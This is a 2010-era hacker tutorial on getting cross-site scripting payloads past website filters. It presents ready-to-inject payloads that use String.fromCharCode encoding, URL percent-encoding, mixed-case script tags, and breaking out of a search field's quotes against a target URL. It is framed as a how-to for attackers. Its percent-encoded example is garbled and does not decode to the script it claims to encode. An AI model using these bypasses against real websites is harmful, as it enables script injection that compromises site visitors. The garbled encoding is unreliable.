Bypass XSS filters (Paper)
######################################## #####
# Title: XSS, how to bypass filters #
# Author: k3nz0 #
# Contact: o9p@hotmail.fr #
# Category: Papers #
# Website: k3nz0.com #
######################################## #####
################# Tunisian ####################
################## Hacker #####################
######################################## #####
This lessons is devided into 3 parts:
[1] Introduction
[2] Types of filters
[3] Conclusion
[1] Introduction:
Nowadays, most of "securised" websites, make filters to dont allow cross site scripting "injections", however, we can bypass
These filters by using the methods shown below :)
[2] Types of filters:
We will learn, how to bypass these xss filters:
[+] Bypass magic_quotes_gpc (if its on)
[+] Bypass with cryption in full html
[+] Bypass with Obfuscation
[+] Bypass with trying around method
######################################## ####
[+] Bypass magic_quotes_gpc
When magic_quotes_gpc is on, it means that the server doesnt allow, ",/and (it depends)
To bypass it we use:
String. fromCharCode ()
We write our code, in the () crypted in ASCII
Exemple:
String. fromCharCode (107, 51,110,122, 48)
(Here I crypted k3nz0 in ascii: 107, 51,110,122, 48
And we use it:
<Script> String. fromCharCode (107, 51,110,122, 48) </script>
We will see: k3nz0
We bypassed magic_quotes_gpc :)
######################################## #####
[+] Bypass with cryption in full html:
Very simple, we have to encode our code in full HTTP!
Our code: <script> alert (I am here) </script>
And in full HTTP:
% 3C % 73% 63% 72% 69% 70% 3E % 74% 6C % 61% 65% 72% 74% 28% 27% 69% 20% 6D % 61% 20% 68% 65% 72% 65% 27% 3C % 2F % 29% 73% 63% 72% 69% 70% 74% 3E
Now, you can inject it :)!
Notice that you can use the tool "Coder" to do encode it in full HTTP
We bypassed filter.
######################################## #####
[+] Bypass with Obfuscation:
Very simple too, this filter, dont allows for exemple these words:
-Script
-Alert
To bypass it, you change "script" with for exemple "sCriPt", and "alert" with "ALerT "!
For exemple:
<ScriPt> ALeRt ("I am here") </scriPt>
We bypassed the filter.
######################################## ######
[+] Bypass with trying around method:
Generally, it is in the searchs scripts, we just add "> at the begining to close current fields:
Exemple:
Http://target.com/search.php? Search = "> <script> alert (" hello ") </script>
We bypassed the filter.
######################################## #######
[3] Conclusion:
It was, how we can bypass xss filters, and how to inject our code :)
This lesson is explained by k3nz0
Thank you for reading
GREETZ: ALLAH! Aymanos, v1r, kannibal615, born to kill, & more ..
######################################## ########©Offensive Security 2010